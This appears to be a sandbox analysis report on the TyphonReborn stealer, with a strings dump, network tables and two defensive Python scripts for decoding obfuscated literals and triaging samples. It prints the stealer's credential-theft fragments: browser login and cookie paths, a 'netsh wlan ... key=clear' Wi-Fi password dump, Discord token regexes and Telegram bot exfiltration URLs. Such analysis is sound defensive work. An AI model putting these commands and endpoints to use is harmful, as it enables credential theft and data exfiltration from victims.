l m%rt?mVQLuIk TD
l U#[`V, rVvLuIk TD
l Vb`0QJVvL v[!tP
l I%Xt5o^"c Y'Zvk[y|
l0O#bdvlJVvL v[!tP
lJb*W/`;|L&"IkP`T'+qqk)ms{
lN b!` x1Q)_!`p&^}' AeNp&guc|
l}#Bo`1l:c'^FuI`_uN|
lU#[x6V(p W) V>_$kF%`  }X) k1W_"V#ex^ M(PwKR y2ZTu en=a%YQ*B|
l Q%rt5T)gwC kP('U-NeNp&gud6
l O#V0W-JWv{&sPk _'Q}a\|
l <Ibx.WpJVvL v[!tP
l svpQx,mOkTtn6
l}@X^vQ"c Y'Zvk[y|
l O#b -WpJV)[&sPk _'Q}a\|
lM bV0md;oVk_&Zv`P
l O"X|)md;o Rte3
l (Q#X`*PJlw^k.p&^}' AeNp&gud6
l O#b -WpJVvL v[!tP
l px?WrV;oV] E! _'T9n'peMk)QuV
luQ$}`)Ws;mOkTtn6
l7Mbd5Ws"c Y'Zvk[y|
l N%m`3TF"`w tsC$<e' A a\)"
lqIZ?Ws-mOkTtn6
l O|0lpJV){'JuI`_uN|
l @b%c|-V-pk[ry
l V"X 2Ws`7mOkTtn6
luQ bE3`/d"dC&e>e&J }P uW
l@mh*`s ,Q &]'^P][ UL,yB)ww-V^>c"L g,Wu&
luIx0Vs ,Q:st"_uI`_u|
luO$X^5Wt"g).LdE ry
l Q%rd?o, u
l7Mbd5o 4
l V%b-ox(T^
l O#b -WpJ lvp'^]'p
l ,Nb|rVr`po.C'>w d_'UN!
lqpVcg&c_%tsE't}]%oByGw3fu
luO#,T^2od'^X!d %oxM'sKeA-|wwC#u
Opera Software
\Web Data
\Login Data
\Network\Cookies
\Local State
\Credit Cards
\Credit Cards\CreditCards_(
)_[
].txt
\Cookies\Cookies_(
\ImportantAutofills.txt
\Autofills
\Autofills\Autofills_(
logins
origin_url
username_value
password_value
credit_cards
name_on_card
expiration_month
expiration_year
cookies
host_key
httponly
secure
encrypted_value
autofill
Opera
Thunderbird
).txt
Firefox
Waterfox
K-Melon
IceDragon
Cyberfox
Blackhawk
Pale Moon
":"([^"]+)"
.compressed
bouncycastle.crypto
costura.bouncycastle.crypto.dll.compressed
costura
costura.costura.dll.compressed
costura.costura.pdb.compressed
dotnetzip
costura.dotnetzip.dll.compressed
costura.dotnetzip.pdb.compressed
system.runtime.interopservices.runtimeinformation
costura.system.runtime.interopservices.runtimeinformation.dll.compressed
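Four of the strings above are not garbage but padded literals. `xcxxxhcxxp 6xx50xxxxxx0xx1`, `TaxxxxsxxxkxxxKilxlx /Fx x/IxM xx` and `Tixxxmxxeoxxxut /Tx x2xxx /Nxxxoxbxrexxxxakx` read `chcp 65001`, `TaskKill /F /IM` and `Timeout /T 2 /Nobreak` once every lowercase x is removed, and `axxHR0xxcHM6xxxxLy9pxcxGFxwxaS5jbxxxxxy8=` becomes the base64 `aHR0cHM6Ly9pcGFwaS5jby8=`, which decodes to `https://ipapi.co/` (consistent with the neighbouring `/json` and `ipapi.co/#c-sharp-v1.03` strings). Next to the `.bat` and `/C` literals, the three command fragments are consistent with a cmd.exe-launched cleanup script that waits, kills the stealer's image and removes it; that reading is an inference from the strings, not something the report confirms. The script below is an added example written for this report, not code from the sample, from ANY.RUN or from the stealer's authors; its assumption, drawn from these four strings alone, is that x is the only padding character and never occurs in the genuine text.

```python
"""De-pad the x-stuffed literals in the TyphonReborn strings dump.

Added example for this report; not code from the sample, from ANY.RUN or from
the stealer's authors.  Assumption (inferred from the four strings below, not
confirmed by disassembly): the only padding character is a lowercase 'x' and
the genuine text never contains one, so dropping every 'x' is lossless here.
"""
import base64
from typing import List

# Literals copied verbatim from the strings dump.
PADDED_CLEANUP_COMMANDS = [
    "xcxxxhcxxp 6xx50xxxxxx0xx1",
    "TaxxxxsxxxkxxxKilxlx /Fx x/IxM xx",
    "Tixxxmxxeoxxxut /Tx x2xxx /Nxxxoxbxrexxxxakx",
]
PADDED_GEOIP_URL = "axxHR0xxcHM6xxxxLy9pxcxGFxwxaS5jbxxxxxy8="


def strip_padding(s: str) -> str:
    """Remove every lowercase 'x' (the padding never uses uppercase 'X')."""
    return s.replace("x", "")


def recover_cleanup_commands() -> List[str]:
    """The cmd.exe fragments behind the three padded strings, trailing
    whitespace dropped: the taskkill fragment ends in a space, presumably
    because the image name is appended at run time."""
    return [strip_padding(s).rstrip() for s in PADDED_CLEANUP_COMMANDS]


def decode_padded_base64(s: str) -> str:
    """De-pad, then base64-decode.  Caveat: the base64 alphabet itself
    contains 'x', so this is only safe when the encoded text has none, which
    holds for this sample's URL; validate=True makes a corrupted decode raise
    instead of returning garbage."""
    return base64.b64decode(strip_padding(s), validate=True).decode("ascii")


def looks_padded(s: str, min_ratio: float = 0.25) -> bool:
    """Heuristic for finding further candidates in a dump: an unusually high
    share of lowercase 'x' in a printable-ASCII string."""
    if len(s) < 8 or not s.isascii():
        return False
    return s.count("x") / len(s) >= min_ratio


if __name__ == "__main__":
    for cmd in recover_cleanup_commands():
        print(cmd)
    print(decode_padded_base64(PADDED_GEOIP_URL))
```

The `looks_padded` ratio is deliberately crude; run it over a full strings output and review the hits by eye rather than trusting it blindly, since long base64 blobs and some file-format magic also contain many x characters.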
Total events: 329
Read events: 329
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 0
Text files: 0
Unknown types: 0

Dropped files: No data

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

HTTP(S) requests: 0
TCP/UDP connections: 7
DNS requests: 2
Threats: 0

HTTP requests: No HTTP requests

Connections

PID   Process        IP                    Domain         ASN    CN  Reputation
4     System         192.168.100.255:137                              whitelisted
3004  b9_v2.bin.exe  173.231.16.76:80      api.ipify.org  WEBNX  US  malicious
4     System         192.168.100.255:138                              whitelisted
1076  svchost.exe    224.0.0.252:5355                                 unknown
2748  svchost.exe    239.255.255.250:1900                             whitelisted
3004  b9_v2.bin.exe  64.185.227.155:80     api.ipify.org  WEBNX  US  malicious
3004  b9_v2.bin.exe  104.237.62.211:80     api.ipify.org  WEBNX  US  suspicious

DNS requests

Domain            IP               Reputation
api.ipify.org     173.231.16.76    shared
                  64.185.227.155
                  104.237.62.211
dns.msftncsi.com  131.107.255.255  shared

Threats

No threats detected
No debug info
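The captured traffic gives a detection engineer little: three plaintext HTTP connections from pid 3004 to api.ipify.org, no request to api.telegram.org, no IDS hits. The strings, by contrast, carry the whole playbook: a Telegram bot C2 assembled from `https://api.telegram.org/bot`, the token, `/sendMessage?chat_id=` and `&text=`; `netsh wlan show profile ... key=clear` for Wi-Fi passwords; `os_crypt` and `encrypted_key` from Chromium's `Local State`; the two Discord token regexes; BSSID geolocation through api.mylnikov.org; `SecurityCenter2`/`AntivirusProduct` for AV enumeration; Firefox's `logins.json` and `key4.db`. The script below is an added example written for this report, not code from the sample, from ANY.RUN or from the stealer's authors. It turns those literals into a small triage: a marker fires only when every fragment of it appears somewhere in the dump (the `netsh` command is split across two strings), the bot id and secret are parsed out of the C2 URL, the exfil endpoints are reconstructed, and external-IP lookups by non-browser processes are flagged from the connection list. The sample strings, the bot token, the chat id and the `sendDocument` reconstruction are constructed or inferred here, not taken from the report; the token format (numeric bot id, colon, 35-character secret) is Telegram's documented shape.

```python
"""Triage a strings dump and a sandbox connection list for TyphonReborn traits.
Added example for this report; not code from the sample, from ANY.RUN or from
the stealer's authors.  The patterns are lifted from the strings dump; the
SAMPLE_* inputs are constructed (placeholder bot token and chat id) so the
script runs offline."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Sequence, Tuple

# A Telegram Bot API token is "<numeric bot id>:<35-character secret>" and every
# call is https://api.telegram.org/bot<token>/<method>, as in the report's C2.
TELEGRAM_BOT_URL = re.compile(
    r"https://api\.telegram\.org/bot(?P<bot_id>\d{8,10}):"
    r"(?P<secret>[A-Za-z0-9_-]{35})/(?P<method>\w+)")

# The Discord token regexes exactly as the dump carries them.  A binary that
# embeds them is hunting Discord tokens, so they are matched as literals.
DISCORD_TOKEN_PATTERNS = [r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"]


def _rx(*pats: str, flags: int = 0) -> List["re.Pattern[str]"]:
    return [re.compile(p, flags) for p in pats]


# A marker fires only when every pattern in its list occurs in some string; the
# dump splits 'netsh wlan show profile' and 'key=clear' across two strings.
MARKERS = {
    "wlan_key_dump": _rx(r"netsh wlan show profile", r"key=clear", flags=re.I),
    "chromium_master_key": _rx(r"\bos_crypt\b", r"\bencrypted_key\b"),
    "discord_token_hunt": _rx(*(re.escape(p) for p in DISCORD_TOKEN_PATTERNS)),
    "bssid_geolocation": _rx(r"api\.mylnikov\.org/geolocation/wifi"),
    "external_ip_lookup": _rx(r"api\.ipify\.org|ipapi\.co"),
    "av_enumeration": _rx(r"SecurityCenter2|AntivirusProduct"),
    "firefox_credential_store": _rx(r"logins\.json", r"key4\.db"),
}

Connection = Tuple[int, str, str]  # (pid, process image, resolved domain)
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe", "opera.exe"}


@dataclass
class Triage:
    markers: List[str] = field(default_factory=list)
    telegram: Optional[Dict[str, str]] = None
    ip_lookup_pids: List[int] = field(default_factory=list)

    @property
    def typhon_like(self) -> bool:
        """Telegram bot C2 plus at least three host-side stealer markers."""
        return self.telegram is not None and len(self.markers) >= 3


def find_telegram_c2(strings: Sequence[str]) -> Optional[Dict[str, str]]:
    for s in strings:
        m = TELEGRAM_BOT_URL.search(s)
        if m:
            return m.groupdict()
    return None


def telegram_exfil_endpoints(bot_id: str, secret: str, chat_id: str) -> Dict[str, str]:
    """URLs the stealer assembles from its fragments: '/sendMessage?chat_id='
    and '&text=' are literal in the dump; joining '/send' with the adjacent
    'Document' string into sendDocument is this example's inference."""
    base = f"https://api.telegram.org/bot{bot_id}:{secret}"
    return {"message": f"{base}/sendMessage?chat_id={chat_id}&text=",
            "document": f"{base}/sendDocument?chat_id={chat_id}"}


def match_markers(strings: Sequence[str]) -> List[str]:
    return [name for name, pats in MARKERS.items()
            if all(any(p.search(s) for s in strings) for p in pats)]


def ip_lookup_from_nonbrowser(conns: Sequence[Connection]) -> List[int]:
    """PIDs of non-browser processes contacting api.ipify.org, the external-IP
    lookup the report shows pid 3004 making three times."""
    return sorted({pid for pid, proc, dom in conns
                   if dom == "api.ipify.org" and proc.lower() not in BROWSERS})


def triage(strings: Sequence[str], conns: Sequence[Connection] = ()) -> Triage:
    return Triage(match_markers(strings), find_telegram_c2(strings),
                  ip_lookup_from_nonbrowser(conns))


# Constructed sample: dump lines from this report plus a placeholder C2 URL.
SAMPLE_STRINGS = [
    "https://api.telegram.org/bot1234567890:" + "A" * 35 + "/getMe",
    '/C timeout /t 5 /nobreak > nul && netsh wlan show profile name="',
    '" key=clear | findstr Key', "os_crypt", "encrypted_key",
    *DISCORD_TOKEN_PATTERNS,
    "https://api.mylnikov.org/geolocation/wifi?v=1.1&data=open&bssid=",
    "http://api.ipify.org", "Select * from AntivirusProduct",
    r"\logins.json", r"\key4.db",
]
SAMPLE_CONNECTIONS: List[Connection] = [
    (4, "System", ""), (3004, "b9_v2.bin.exe", "api.ipify.org"), (2748, "svchost.exe", "")]

if __name__ == "__main__":
    result = triage(SAMPLE_STRINGS, SAMPLE_CONNECTIONS)
    print(result, result.typhon_like)
```

The all-fragments rule is what keeps the markers usable on real dumps: a single `key=clear` or `os_crypt` occurs in plenty of legitimate tooling, but the combination of a Telegram bot URL with three or more of these markers in one .NET image is the Typhon profile this report documents. Feed `find_telegram_c2` the strings of a fresh sample and the recovered bot id is the pivot for blocking and for hunting other builds that share the operator's token.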